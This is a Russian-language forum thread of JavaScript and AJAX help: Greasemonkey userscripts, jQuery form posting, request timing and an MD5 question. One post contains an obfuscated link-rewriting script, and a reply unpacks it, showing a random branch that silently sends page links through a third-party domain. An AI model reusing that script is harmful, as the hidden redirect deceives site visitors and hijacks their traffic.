[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. Niades

    Niades New Member

    Joined:
    30 Nov 2010
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Возможно ли расшифровать md5 хэш средствами JS?
     
  2. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    Его вообще нереально расшифровать, только брутить
     
  3. Niades

    Niades New Member

    Joined:
    30 Nov 2010
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Спасибо, но необходимость в расшифровке уже отпала, найден другой способ реализовать задуманное.
     
  4. gari159

    gari159 New Member

    Joined:
    20 Nov 2010
    Messages:
    26
    Likes Received:
    1
    Reputations:
    0
    неактуально.
     
    #2784 gari159, 17 Dec 2010
    Last edited: 18 Dec 2010
  5. Rastamanka

    Rastamanka Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    428
    Likes Received:
    11
    Reputations:
    7
    Подскажите в чем проблема? Запускают данный код через greasemonkey.
    Если ставлю alert(duc) внутри функции GM_xmlhttpRequest то алерт выводит нормальное значение. Но если ставлю такой же алерт внутри функции refresh() то выводит undefined. Необходимо чтобы значения полученные в функции GM_xmlhttpRequest нормально выводились в функции refresh
    Code:
    
    // ==UserScript==
    // @name test
    // @namespace *www.site.com*
    // @include        *
    // ==/UserScript==
    var xpc;
    var duc;
    var kgc;
    var pgc;
    
    	GM_xmlhttpRequest({
    	    method: 'GET',
    	    url: 'http://localhost/1.php?boss=boss',
    	    headers: {
    	        'User-agent': 'Mozilla/4.0 (compatible) Greasemonkey/0.3',
    	        'Accept': 'application/atom+xml,application/xml,text/xml',
    	    },
    	  onload: function(responseDetails) {
    	        var parser = new DOMParser();
    	        var dom = parser.parseFromString(responseDetails.responseText,
    	            "application/xml");
    	 dus = dom.getElementsByTagName('root');
    	 duc = dus[0].getElementsByTagName('du')[0].textContent;
             xpc = dus[0].getElementsByTagName('xp')[0].textContent;
    	 kgc = dus[0].getElementsByTagName('kg')[0].textContent;
    	 pgc = dus[0].getElementsByTagName('pg')[0].textContent;
       }
    
    	});
    
    (function(){
    
    refresh();
    }
    )();
    
    
    function refresh(){
    divPr = document.createElement("div");
    divPr.innerHTML = '';
    divPr.setAttribute("style",'position:absolute;cursor:pointer;top:0px;right:15%;background:#F2D48C;padding: 3px 3px;');
    document.getElementsByTagName('body')[0].appendChild(divPr);
    
    var bOpenBags = document.createElement("b");
    var img = document.createElement('img');
    bOpenBags.innerHTML = '��: <input type="text" name="du" id="du" maxlength="5" size="5" style="font-family:Tahoma; font-size:12; text-align:center; background-color:rgb(255,204,102); border-width:1; border-color:rgb(51,51,51); border-style:dotted;"  value='+duc+'><br>';
    bOpenBags.setAttribute("style",'color:#228B22;');
    divPr.appendChild(bOpenBags);
    
    var bOpenBags = document.createElement("b");
    var img = document.createElement('img');
    bOpenBags.innerHTML = '��:  <input type="text" name="xp" id="xp" maxlength="5" size="5" style="font-family:Tahoma; font-size:12; text-align:center; background-color:rgb(255,204,102); border-width:1; border-color:rgb(51,51,51); border-style:dotted;"  value='+xpc+'><br>';
    bOpenBags.setAttribute("style",'color:#228B22;');
    divPr.appendChild(bOpenBags);
    
    
    var bOpenBags = document.createElement("b");
    var img = document.createElement('img');
    bOpenBags.innerHTML = '��:   <input type="text" name="kg" id="kg" maxlength="5" size="5" style="font-family:Tahoma; font-size:12; text-align:center; background-color:rgb(255,204,102); border-width:1; border-color:rgb(51,51,51); border-style:dotted;"  value='+pgc+'><br>';
    bOpenBags.setAttribute("style",'color:#228B22;');
    divPr.appendChild(bOpenBags);
    
    
    var bOpenBags = document.createElement("b");
    var img = document.createElement('img');
    bOpenBags.innerHTML = '��:  <input type="text" name="pg" id="pg" maxlength="5" size="5" style="font-family:Tahoma; font-size:12; text-align:center; background-color:rgb(255,204,102); border-width:1; border-color:rgb(51,51,51); border-style:dotted;"  value='+xpc+'><br>';
    bOpenBags.setAttribute("style",'color:#228B22;');
    divPr.appendChild(bOpenBags);
    }
    
    
    Я правда нашла тут примерный ответ на вопрос но понять как это реализовать не понимаю. Кто может подскажите
     
    #2785 Rastamanka, 19 Dec 2010
    Last edited: 19 Dec 2010
  6. Rastamanka

    Rastamanka Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    428
    Likes Received:
    11
    Reputations:
    7
    Кто подскажите на странице выводиться alert() при определенных обстоятельствах с текстом stop spamming. Можно ли как-то его заблокировать чтобы он не выводился средствами JS ?
     
  7. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    удалить тот улерт из кода? запретить в бразере выводить алерты на текущей странице?
     
  8. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Как передать php скрипту ajax-ом данные,сгенеренные js скриптом через html форму?

    Код:

    PHP:

    <script>


    $(
    "#sub").click(function() {

    $(
    "#t").text("0000000");

    $.
    ajax({

    url"one.php",
    data: $("#f").serialize(),
    dataType"text",
    success: function(data) {


    //alert(data);


    }


    });

    });

    </script>



    #sub - сабмит кнопка формы
    #f - айди формы
    #t - данные,которые хочу передать
    one.php - данные,которые нужно туда передать


    Трабла в том,что методу сериалайз() как бы пох на то,что я js пытаюсь установить значения формы.Например, var t = 000000; $("#t").text(t);

    Вот так и не работает...В общем,нужен рабочий вариант =\
    Форма передаётся постом.
     
  9. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    1) Сереалайз - нужен для Своего ajax,т.е. это уже углубленная разработка,а ajax самого jQuery - сам берёт все данные со всех частей формы...т.е. $("#f")
    2) если не выходит или не нужно что-то слать или на оборот дополнительно - делай запрос сам,к примеру
    data:{name:$('#f input[name=name]').val(),pass:$('#f input[name=pass]').val()},
    3) куча примеров на офф-сайте http://api.jquery.com/jQuery.ajax/
    4) Когда задаешь вопрос - давай ПОЛНЫЙ код,сложно понять ошибку когда ты расписал Своими непонятными терминами всё...если хочешь чтобы помогли - выреж Всю форму и выреж этот аякс,чтобы люди могли Затестить у себя,и поправить как Нужно уже имеющийся вариант!
     
  10. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Ну вот форма:


    PHP:

    <html>
    <
    head>
    <
    script src="jq.js"></script>
    </head>
    <body>

    <div style="position:absolute;top:20%;left:40%;">
    <form id="f">
    <input type="hidden" id="t" name="something" value="">
    <input type="submit" id="sub" name="sub" value="Send data">
    </form>
    </div>

    </body>
    </html>

    Всего-то и нужно,что сгенерить произвольное число и послать его постом другому php скрипту через ajax.Но проблему я понял хоть...
     
  11. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Я не понимаю,как в $.ajax() юзать этот data.

    я так понял,что data:{x:$("#s").val()} передаст php скрипту x=значение,например,x=5.Число 5 берётся из элемента с id="s"

    К примеру,из формы:

    PHP:
    <form>
    <
    input type="text" id="s" value=5>
    </
    form>
     
  12. ^_WhitE_DeMoN_^

    Joined:
    1 Mar 2009
    Messages:
    102
    Likes Received:
    10
    Reputations:
    0
    Задача...

    Есть такой вот скрипт:

    Code:
    var enable_relink = 1;
    var link_src = [
      "www"
    ];
    var dest = "go/go.php?go=";
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('7 a(s){4 3=o;5(i q 9)2(s.k(9[i])>=0){3=n;m}8 3}7 b(){2(!p)8;2(6.d(6.e()*h)==g)c="f://B-z.y/E/C.D?u=";4 1="";4 l=t.r("A");5(j=0;j<l.x;j++){1=l[j].w("1");2(a(1)){l[j].v("1",c+1)}}}b();',41,41,'|href|if|res|var|for|Math|function|return|link_src|isMatch|kapkan|dest|round|random|http|14|100|||indexOf||break|true|false|enable_relink|in|getElementsByTagName||document|go|setAttribute|getAttribute|length|com|ebooks||pc|index|php|getlink'.split('|'),0,{}))
    var link_src у нас массив с условиями - если на странице есть ЛИНК содержащий "www", то меняем его на "go/go.php?go=ЛИНК".
    А как прописать изключения ? Например: ЛИНК содержащий "www" и не содержащий "facebook".
     
  13. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Ну для начала было-бы хорошо давать не обфусцированые скрипты)

    Code:
    var enable_relink = 1;
    var link_src = [
      "www"
    ];
    var dest = "go/go.php?go=";
    
    function isMatch(s) {
        var res = false;
        for (i in link_src) if (s.indexOf(link_src[i]) >= 0) {
            res = true;
            break;
        }
        return res;
    }
    function kapkan() {
        if (!enable_relink) return;
        if (Math.round(Math.random() * 100) == 14) dest = "http://pc-ebooks.com/getlink/index.php?go=";
        var href = "";
        var l = document.getElementsByTagName("A");
        for (j = 0; j < l.length; j++) {
            href = l[j].getAttribute("href");
            if (isMatch(href)) {
                l[j].setAttribute("href", dest + href);
            }
        }
    }
    kapkan();
    как будет время гляну что с исключениями придумать
     
    1 person likes this.
  14. SHiNiGaMi

    SHiNiGaMi Banned

    Joined:
    3 Jan 2010
    Messages:
    382
    Likes Received:
    55
    Reputations:
    15
    как-нибудь так:
    Code:
    function isMatch(s) {
        var res = false;
        [B]for (i in link_src) if ((s.indexOf(link_src[i]) >= 0) && (s.indexOf("exception") < 0)) [/B]{
            res = true;
            break;
        }
        return res;
    }
    
     
    1 person likes this.
  15. ^_WhitE_DeMoN_^

    Joined:
    1 Mar 2009
    Messages:
    102
    Likes Received:
    10
    Reputations:
    0
    Первое пойми разницу между Java и JavaScript, потом собирайся писать игры...
     
  16. AtomoS

    AtomoS New Member

    Joined:
    17 Feb 2010
    Messages:
    88
    Likes Received:
    1
    Reputations:
    0
    привет всем. столкнулся с большой проблемой(

    есть сайт kartbay.ru вверху поиск по каталогу. при вводе фразы нас перекидывает на страницу /catalog и данные переносятся в другую форму поиска.

    но.. не выполняется сортировка на лету. как испраить этот недочёт или как вообще сделать всё по другому?
     
  17. MaTpOc

    MaTpOc Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    633
    Likes Received:
    475
    Reputations:
    25
    Кто знает, как сделать ява скрипт который при вставе в адресную строку перенаправлял пользователя на другой сайт?
     
  18. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    795
    Likes Received:
    140
    Reputations:
    73
    javascript:location.href='http://ya.ru'
     
  19. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    789
    Likes Received:
    327
    Reputations:
    83
    Подскажите как сделать.
    В общем есть цикл в котором переменной val присваиваються элементы массива actionSpusk
    Code:
          for (var key in actionSpusk) {
    	    var val = actionSpusk[key];
                vUrl = (tmDomain+'/'+val);
                GM_xmlhttpRequest({method: "GET", url: vUrl,});
    
        }
    
    

    Так вот надо установить таймаут 2 секунды между запросами на каждую ссылку из массива за переход по ссылке отвечает код
    Code:
    GM_xmlhttpRequest({method: "GET", url: vUrl,});
    
    Пробовал вот так, но переходы по ссылкам происходят без задержки несмотря на установленный таймаут.
    Code:
    setTimeout(GM_xmlhttpRequest({method: "GET", url: vUrl,}),2000);

    Вот более подробный код
    Code:
    for (var q=0;q<items.length;q++){
      art_id = items[q].getAttribute("art_id");
      id = items[q].getAttribute("id");
      var amount = items[q].getAttribute("amount");
      var vUrl;
    if (art_id==160 && amount<100) { 
    
           for (var key in actionSpusk) {
    	    var val = actionSpusk[key];
                vUrl = (tmDomain+'/'+val);
             GM_xmlhttpRequest({method: "GET", url: vUrl,});
    
              }
    
         }
    
    
        }
    
     
    #2799 cardons, 13 Jan 2011
    Last edited: 13 Jan 2011
  20. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    795
    Likes Received:
    140
    Reputations:
    73
    setInterval(func,num); //func - Функция , num - задержка
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.